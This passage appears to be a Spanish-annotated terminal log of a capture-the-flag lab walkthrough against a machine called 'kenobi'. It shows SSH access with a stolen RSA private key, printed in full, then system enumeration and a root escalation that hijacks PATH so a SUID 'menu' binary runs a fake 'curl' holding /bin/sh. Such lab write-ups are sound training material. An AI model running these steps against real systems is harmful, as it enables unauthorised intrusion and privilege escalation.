dmw3WymUQ+DY8D/ybJ3Vv+vKcMhwicvNzvOo1JH433PEqd/0B0VGuIwCOtdl6DI9
u/vVpkvsk3Gjsyh5gFI8iZuWAtWE5Av4OC5bwMXw8ZeLxr0y1JKw8ge9NSDl/Pph
YNY61y+DdXUvywifkzFmhYkCgYB6TeZbh9XBVg3gyhMnaQNzDQFAUlhM7n/Alcb7
TjJQWo06tOlHQIWi+Ox7PV9c6l/2DFDfYr9nYnc67pLYiWwE16AtJEHBJSHtofc7
P7Y1PqPxnhW+SeDqtoepp3tu8kryMLO+OF6Vv73g1jhkUS/u5oqc8ukSi4MHHlU8
H94xjQKBgExhzreYXCjK9FswXhUU9avijJkoAsSbIybRzq1YnX0gSewY/SB2xPjF
S40wzYviRHr/h0TOOzXzX8VMAQx5XnhZ5C/WMhb0cMErK8z+jvDavEpkMUlR+dWf
Py/CLlDCU4e+49XBAPKEmY4DuN+J2Em/tCz7dzfCNS/mpsSEn0jo
-----END RSA PRIVATE KEY-----
┌──(root㉿kali)-[~]
└─# ls montado/tmp
id_rsa
systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
systemd-private-85854cf8e49f489b994d9a21472b5bdc-systemd-timesyncd.service-dfN4oS
systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn
┌──(root㉿kali)-[~]
└─# ls montado
backups cache crash lib local lock log mail opt run snap spool tmp www
┌──(root㉿kali)-[~]
└─# ls -la montado/tmp
total 28
drwxrwxrwt 6 root root 4096 Jan 17 00:41 .
drwxr-xr-x 14 root root 4096 Sep 4 2019 ..
-rw-r--r-- 1 kali lxd 1675 Jan 17 00:41 id_rsa
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------ 3 root root 4096 Jan 16 22:27 systemd-private-85854cf8e49f489b994d9a21472b5bdc-systemd-timesyncd.service-dfN4oS
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn
CONECTAMOS POR SSH CON SU RSA:
┌──(root㉿kali)-[~]
└─# chmod 600 montado/tmp/id_rsa
chmod: changing permissions of 'montado/tmp/id_rsa': Read-only file system
┌──(root㉿kali)-[~]
└─# ls -la montado/tmp
total 28
drwxrwxrwt 6 root root 4096 Jan 17 00:41 .
drwxr-xr-x 14 root root 4096 Sep 4 2019 ..
-rw-r--r-- 1 kali lxd 1675 Jan 17 00:41 id_rsa
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------ 3 root root 4096 Jan 16 22:27 systemd-private-85854cf8e49f489b994d9a21472b5bdc-systemd-timesyncd.service-dfN4oS
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn
┌──(root㉿kali)-[~]
└─# ssh -i montado/tmp/id_rsa kenobi@10.10.112.128
The authenticity of host '10.10.112.128 (10.10.112.128)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.112.128' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ whoami
kenobi
kenobi@kenobi:~$
kenobi@kenobi:~$ pwd
/home/kenobi
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899
ENUMERACION PARA ESCALADAD E PRIVILEGIOS:
kenobi@kenobi:~$ env
XDG_SESSION_ID=3
TERM=xterm-256color
SHELL=/bin/bash
SSH_CLIENT=10.10.28.19 33044 22
SSH_TTY=/dev/pts/0
USER=kenobi
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
MAIL=/var/mail/kenobi
PATH=/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
PWD=/home/kenobi
LANG=en_US.UTF-8
SHLVL=1
HOME=/home/kenobi
LOGNAME=kenobi
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_CONNECTION=10.10.28.19 33044 10.10.112.128 22
LESSOPEN=| /usr/bin/lesspipe %s
XDG_RUNTIME_DIR=/run/user/1000
LESSCLOSE=/usr/bin/lesspipe %s %s
_=/usr/bin/env
kenobi@kenobi:~$ uname -a
Linux kenobi 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
kenobi@kenobi:~$ cat /proc/issue
cat: /proc/issue: No such file or directory
kenobi@kenobi:~$ hostname
kenobi
kenobi@kenobi:~$ cat /proc/version
Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
kenobi@kenobi:~$ cat /etc/issue
Ubuntu 16.04.6 LTS \n \l
kenobi@kenobi:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
kenobi:x:1000:1000:kenobi,,,:/home/kenobi:/bin/bash
statd:x:110:65534::/var/lib/nfs:/bin/false
kenobi@kenobi:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
kenobi@kenobi:~$ sudo -l
[sudo] password for kenobi:
Sorry, try again.
[sudo] password for kenobi:
Sorry, try again.
[sudo] password for kenobi:
sudo: 2 incorrect password attempts
kenobi@kenobi:~$ id
uid=1000(kenobi) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
kenobi@kenobi:~$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 0.0.0.0:39285 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:41535 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:38413 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:36335 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 288 10.10.112.128:22 10.10.28.19:33044 ESTABLISHED on (0.01/0/0)
tcp 0 0 10.10.112.128:2049 10.10.28.19:730 ESTABLISHED off (0.00/0/0)
tcp6 0 0 :::58931 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::445 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::55359 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::2049 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::39751 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::139 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::111 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::53969 :::* LISTEN off (0.00/0/0)
udp 0 0 0.0.0.0:60953 0.0.0.0:* off (0.00/0/0)
udp 0 0 0.0.0.0:68 0.0.0.0:* off (0.00/0/0)
udp 0 0 0.0.0.0:111 0.0.0.0:* off (0.00/0/0)
udp 0 0 10.10.255.255:137 0.0.0.0:* off (0.00/0/0)
udp 0 0 10.10.112.128:137 0.0.0.0:* off (0.00/0/0)
udp 0 0 0.0.0.0:137 0.0.0.0:* off (0.00/0/0)
udp 0 0 10.10.255.255:138 0.0.0.0:* off (0.00/0/0)
udp 0 0 10.10.112.128:138 0.0.0.0:* off (0.00/0/0)
udp 0 0 0.0.0.0:138 0.0.0.0:* off (0.00/0/0)
udp 0 0 0.0.0.0:59337 0.0.0.0:* off (0.00/0/0)
udp 0 0 0.0.0.0:54505 0.0.0.0:* off (0.00/0/0)
udp 0 0 0.0.0.0:55278 0.0.0.0:* off (0.00/0/0)
udp 0 0 0.0.0.0:758 0.0.0.0:* off (0.00/0/0)
udp 0 0 0.0.0.0:2049 0.0.0.0:* off (0.00/0/0)
udp6 0 0 :::38451 :::* off (0.00/0/0)
udp6 0 0 :::111 :::* off (0.00/0/0)
udp6 0 0 :::56773 :::* off (0.00/0/0)
udp6 0 0 :::758 :::* off (0.00/0/0)
udp6 0 0 :::42745 :::* off (0.00/0/0)
udp6 0 0 :::43003 :::* off (0.00/0/0)
udp6 0 0 :::2049 :::* off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 10365 /run/systemd/private
unix 2 [ ] DGRAM 21940 /run/user/1000/systemd/notify
unix 2 [ ACC ] STREAM LISTENING 21941 /run/user/1000/systemd/private
unix 2 [ ACC ] SEQPACKET LISTENING 11228 /run/udev/control
unix 2 [ ACC ] STREAM LISTENING 10369 /run/systemd/journal/stdout
unix 7 [ ] DGRAM 10370 /run/systemd/journal/socket
unix 2 [ ACC ] STREAM LISTENING 10371 /run/lvm/lvmetad.socket
unix 2 [ ACC ] STREAM LISTENING 10372 /run/lvm/lvmpolld.socket
unix 2 [ ] DGRAM 10785 /run/systemd/journal/syslog
unix 11 [ ] DGRAM 10839 /run/systemd/journal/dev-log
unix 2 [ ACC ] STREAM LISTENING 11115 /run/systemd/fsck.progress
unix 2 [ ] DGRAM 14694 /var/lib/samba/private/msg.sock/864
unix 2 [ ACC ] STREAM LISTENING 13672 /run/snapd.socket
unix 2 [ ] DGRAM 14697 /var/lib/samba/private/msg.sock/865
unix 2 [ ] DGRAM 14778 /var/lib/samba/private/msg.sock/929
unix 2 [ ACC ] STREAM LISTENING 13654 /run/acpid.socket
unix 2 [ ACC ] STREAM LISTENING 13655 /run/rpcbind.sock
unix 2 [ ACC ] STREAM LISTENING 13673 /run/snapd-snap.socket
unix 2 [ ] DGRAM 17273 /var/lib/samba/private/msg.sock/1224
unix 2 [ ACC ] STREAM LISTENING 13675 /var/run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 15475 @ISCSIADM_ABSTRACT_NAMESPACE
unix 3 [ ] DGRAM 10364 /run/systemd/notify
unix 2 [ ACC ] STREAM LISTENING 17283 /var/run/samba/nmbd/unexpected
unix 3 [ ] DGRAM 12170
unix 3 [ ] STREAM CONNECTED 12042 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 14021 /run/systemd/journal/stdout
unix 3 [ ] DGRAM 12171
unix 3 [ ] STREAM CONNECTED 14101
unix 2 [ ] DGRAM 15690
unix 2 [ ] DGRAM 12871
unix 3 [ ] STREAM CONNECTED 14430
unix 3 [ ] STREAM CONNECTED 21903 /run/systemd/journal/stdout
unix 3 [ ] DGRAM 12876
unix 2 [ ] DGRAM 14352
unix 3 [ ] STREAM CONNECTED 15611
unix 3 [ ] STREAM CONNECTED 14361
unix 3 [ ] STREAM CONNECTED 22028
unix 2 [ ] DGRAM 12057
unix 3 [ ] STREAM CONNECTED 15613 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 12723
unix 3 [ ] STREAM CONNECTED 11506
unix 3 [ ] STREAM CONNECTED 13957
unix 3 [ ] STREAM CONNECTED 12798 /run/systemd/journal/stdout
unix 2 [ ] DGRAM 21895
unix 3 [ ] STREAM CONNECTED 11507 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 14431 /run/systemd/journal/stdout
unix 2 [ ] DGRAM 15439
unix 3 [ ] STREAM CONNECTED 14019
unix 2 [ ] DGRAM 15468
unix 2 [ ] DGRAM 21914
unix 3 [ ] DGRAM 12877
unix 3 [ ] STREAM CONNECTED 14364 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 14306
unix 2 [ ] DGRAM 21812
unix 3 [ ] DGRAM 12879
unix 2 [ ] DGRAM 11279
unix 3 [ ] STREAM CONNECTED 14362
unix 2 [ ] DGRAM 15476
unix 3 [ ] STREAM CONNECTED 14363 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 22029
unix 3 [ ] STREAM CONNECTED 12041
unix 2 [ ] STREAM CONNECTED 16050
unix 3 [ ] STREAM CONNECTED 21888
unix 3 [ ] STREAM CONNECTED 13958 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 12795
unix 3 [ ] DGRAM 12878
unix 2 [ ] DGRAM 13337
unix 3 [ ] STREAM CONNECTED 14296
unix 2 [ ] DGRAM 14086
unix 2 [ ] DGRAM 14165
unix 3 [ ] STREAM CONNECTED 14298 /run/systemd/journal/stdout
unix 2 [ ] DGRAM 11107
unix 3 [ ] STREAM CONNECTED 15317
unix 3 [ ] STREAM CONNECTED 15320 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 14297 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 12724
unix 3 [ ] STREAM CONNECTED 14234
kenobi@kenobi:~$ find / -type f -name flag.txt 2>/dev/null
kenobi@kenobi:~$ find / -writable -type d 2>/dev/null
/var/crash
/var/spool/samba
/var/tmp
/var/lib/samba/usershares
/var/lib/lxcfs/proc
/var/lib/lxcfs/cgroup
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1000.slice/user@1000.service
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1000.slice/user@1000.service/init.scope
/proc/1891/task/1891/fd
/proc/1891/fd
/proc/1891/map_files
/sys/fs/cgroup/systemd/user.slice/user-1000.slice/user@1000.service
/sys/fs/cgroup/systemd/user.slice/user-1000.slice/user@1000.service/init.scope
/tmp
/tmp/.XIM-unix
/tmp/.font-unix
/tmp/.X11-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/home/kenobi
/home/kenobi/.ssh
/home/kenobi/.cache
/home/kenobi/share
/run/user/1000
/run/user/1000/systemd
/run/lock
/dev/mqueue
/dev/shm
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
EJECUTAMOS EL BINARIO D MENU CON BIT SUID ACTIVO :
kenobi@kenobi:/usr/bin$ ./menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Wed, 17 Jan 2024 01:50:40 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html
kenobi@kenobi:/usr/bin$ ./menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
4.8.0-58-generic
kenobi@kenobi:/usr/bin$ ./menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
eth0 Link encap:Ethernet HWaddr 02:f5:fc:c4:ad:03
inet addr:10.10.14.186 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::f5:fcff:fec4:ad03/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:365 errors:0 dropped:0 overruns:0 frame:0
TX packets:553 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:33752 (33.7 KB) TX bytes:103336 (103.3 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:178 errors:0 dropped:0 overruns:0 frame:0
TX packets:178 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:13381 (13.3 KB) TX bytes:13381 (13.3 KB)
CREAMOS UN ARCHIVO LLAMADO CURL CON UNA SHELL DE TERMINAS DE BIN/Sh PARA TARTAR DE EJECUTARLA LUEGO COMO ROOT DESDE UN AGREGADO DE ESTA RUTA DE /TMP AL PATH VARIABL DE AMBIENT Y LO EJECUTAMOS ATRAVES DEL BINARIOO "MENU" QUE SABEMOS EJECUTA CURL (PERO AGREGAMOS NUESTRA RUTA /TMP PRIMERA EN EL PATH PARA QUE EJECUTE NUESTRO EJECUTABLE FALSO DE CURL Y LO ENCUENTRA PRIMERO; Y NO ENCUENTRE PRIMERO EL CURL ORIGINAL):
kenobi@kenobi:/usr/bin$ cd /tmp
kenobi@kenobi:/tmp$ ls
systemd-private-e235b2d7e52a4e3182a0c5aba6495a27-systemd-timesyncd.service-pGZs02
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ ls
curl systemd-private-e235b2d7e52a4e3182a0c5aba6495a27-systemd-timesyncd.service-pGZs02
kenobi@kenobi:/tmp$ çcat curl
-bash: çcat: command not found
kenobi@kenobi:/tmp$ cat curl
/bin/sh
kenobi@kenobi:/tmp$ ls -l
total 8
-rw-rw-r-- 1 kenobi kenobi 8 Jan 16 19:57 curl
drwx------ 3 root root 4096 Jan 16 19:31 systemd-private-e235b2d7e52a4e3182a0c5aba6495a27-systemd-timesyncd.service-pGZs02
kenobi@kenobi:/tmp$ chmon +x curl
-bash: chmon: command not found
kenobi@kenobi:/tmp$ chmod +x curl
kenobi@kenobi:/tmp$ ls
curl systemd-private-e235b2d7e52a4e3182a0c5aba6495a27-systemd-timesyncd.service-pGZs02
kenobi@kenobi:/tmp$ ls -l
total 8
-rwxrwxr-x 1 kenobi kenobi 8 Jan 16 19:57 curl
drwx------ 3 root root 4096 Jan 16 19:31 systemd-private-e235b2d7e52a4e3182a0c5aba6495a27-systemd-timesyncd.service-pGZs02
kenobi@kenobi:/tmp$ echo $PATH
/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
kenobi@kenobi:/tmp$ export PATH=$PATH:/tmp
kenobi@kenobi:/tmp$ echo $PATH
/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/tmp
ESCALAMOS PRIVILEGIO ROOT:
kenobi@kenobi:/usr/bin$ export PATH=/tmp:$PATH
kenobi@kenobi:/usr/bin$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/tmp
kenobi@kenobi:/usr/bin$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# whoami
root
LO HICIMOS CON EL IFCONFIG TAMBIEN :D:
kenobi@kenobi:/usr/bin$ cd /tmp
kenobi@kenobi:/tmp$ ls
curl systemd-private-e235b2d7e52a4e3182a0c5aba6495a27-systemd-timesyncd.service-pGZs02
kenobi@kenobi:/tmp$ echo /bin/sh > ifconfig
kenobi@kenobi:/tmp$ ls -l
total 12
-rwxrwxr-x 1 kenobi kenobi 8 Jan 16 19:57 curl
-rw-rw-r-- 1 kenobi kenobi 8 Jan 16 20:23 ifconfig
drwx------ 3 root root 4096 Jan 16 19:31 systemd-private-e235b2d7e52a4e3182a0c5aba6495a27-systemd-timesyncd.service-pGZs02
kenobi@kenobi:/tmp$ chmod 777 ifconfig
kenobi@kenobi:/tmp$ ls -l
total 12
-rwxrwxr-x 1 kenobi kenobi 8 Jan 16 19:57 curl
-rwxrwxrwx 1 kenobi kenobi 8 Jan 16 20:23 ifconfig
drwx------ 3 root root 4096 Jan 16 19:31 systemd-private-e235b2d7e52a4e3182a0c5aba6495a27-systemd-timesyncd.service-pGZs02
kenobi@kenobi:/tmp$ cd /usr/bin
kenobi@kenobi:/usr/bin$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
# whoami
root
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# Connection to 10.10.14.186 closed by remote host.
Connection to 10.10.14.186 closed.
++++++++++++++++++++
SE NOS DESCONECTO Y CREAMOS RAPIDOEL id_rsa.key dimos permisoso 600 y concetamos de nuevo:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA4PeD0e0522UEj7xlrLmN68R6iSG3HMK/aTI812CTtzM9gnXs
qpweZL+GJBB59bSG3RTPtirC3M9YNTDsuTvxw9Y/+NuUGJIq5laQZS5e2RaqI1nv
U7fXEQlJrrlWfCy9VDTlgB/KRxKerqc42aU+/BrSyYqImpN6AgoNm/s/753DEPJt
dwsr45KFJOhtaIPA4EoZAq8pKovdSFteeUHikosUQzgqvSCv1RH8ZYBTwslxSorW
y3fXs5GwjitvRnQEVTO/GZomGV8UhjrT3TKbPhiwOy5YA484Lp3ES0uxKJEnKdSt
otHFT4i1hXq6T0CvYoaEpL7zCq7udl7KcZ0zfwIDAQABAoIBAEDl5nc28kviVnCI
ruQnG1P6eEb7HPIFFGbqgTa4u6RL+eCa2E1XgEUcIzxgLG6/R3CbwlgQ+entPssJ
dCDztAkE06uc3JpCAHI2Yq1ttRr3ONm95hbGoBpgDYuEF/j2hx+1qsdNZHMgYfqM
bxAKZaMgsdJGTqYZCUdxUv++eXFMDTTw/h2SCAuPE2Nb1f1537w/UQbB5HwZfVry
tRHknh1hfcjh4ZD5x5Bta/THjjsZo1kb/UuX41TKDFE/6+Eq+G9AvWNC2LJ6My36
YfeRs89A1Pc2XD08LoglPxzR7Hox36VOGD+95STWsBViMlk2lJ5IzU9XVIt3EnCl
bUI7DNECgYEA8ZymxvRV7yvDHHLjw5Vj/puVIQnKtadmE9H9UtfGV8gI/NddE66e
t8uIhiydcxE/u8DZd+mPt1RMU9GeUT5WxZ8MpO0UPVPIRiSBHnyu+0tolZSLqVul
rwT/nMDCJGQNaSOb2kq+Y3DJBHhlOeTsxAi2YEwrK9hPFQ5btlQichMCgYEA7l0c
dd1mwrjZ51lWWXvQzOH0PZH/diqXiTgwD6F1sUYPAc4qZ79blloeIhrVIj+isvtq
mgG2GD0TWueNnddGafwIp3USIxZOcw+e5hHmxy0KHpqstbPZc99IUQ5UBQHZYCvl
SR+ANdNuWpRTD6gWeVqNVni9wXjKhiKM17p3RmUCgYEAp6dwAvZg+wl+5irC6WCs
dmw3WymUQ+DY8D/ybJ3Vv+vKcMhwicvNzvOo1JH433PEqd/0B0VGuIwCOtdl6DI9
u/vVpkvsk3Gjsyh5gFI8iZuWAtWE5Av4OC5bwMXw8ZeLxr0y1JKw8ge9NSDl/Pph
YNY61y+DdXUvywifkzFmhYkCgYB6TeZbh9XBVg3gyhMnaQNzDQFAUlhM7n/Alcb7
TjJQWo06tOlHQIWi+Ox7PV9c6l/2DFDfYr9nYnc67pLYiWwE16AtJEHBJSHtofc7
P7Y1PqPxnhW+SeDqtoepp3tu8kryMLO+OF6Vv73g1jhkUS/u5oqc8ukSi4MHHlU8
H94xjQKBgExhzreYXCjK9FswXhUU9avijJkoAsSbIybRzq1YnX0gSewY/SB2xPjF
S40wzYviRHr/h0TOOzXzX8VMAQx5XnhZ5C/WMhb0cMErK8z+jvDavEpkMUlR+dWf
Py/CLlDCU4e+49XBAPKEmY4DuN+J2Em/tCz7dzfCNS/mpsSEn0jo
-----END RSA PRIVATE KEY-----
ssh -i montado/tmp/id_rsa kenobi@10.10.14.186